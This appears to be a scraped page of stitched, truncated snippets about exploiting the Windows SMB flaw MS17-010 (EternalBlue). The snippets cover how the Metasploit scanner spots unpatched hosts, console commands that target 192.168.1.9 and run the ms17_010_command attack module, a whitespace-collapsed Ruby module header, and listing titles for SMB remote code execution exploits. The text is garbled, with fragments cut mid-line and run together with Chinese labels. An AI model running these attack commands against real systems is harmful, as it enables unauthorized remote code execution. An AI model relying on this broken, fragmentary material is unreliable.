it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. This Metasploit module does not require valid SMB credentials in default server configurations...
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.1.9 攻击 msf6 auxiliary(admin/smb/ms17_010_command) > runormsf6 auxiliary(admin/smb/ms17_010_command) > exploit 模块分析 源码 在线,https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/smb/ms17_01...
### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework### auxiliary/scanner/smb/smb_ms_17_010require'msf/core'classMetasploitModule<Msf::AuxiliaryincludeMsf::Exploit::Remote::SMB::ClientincludeMsf::Exploit::Remote::SMB:...
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution __EOF__
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010). CVE-2017-0144 . remote exploit for Windows_x86-64 platform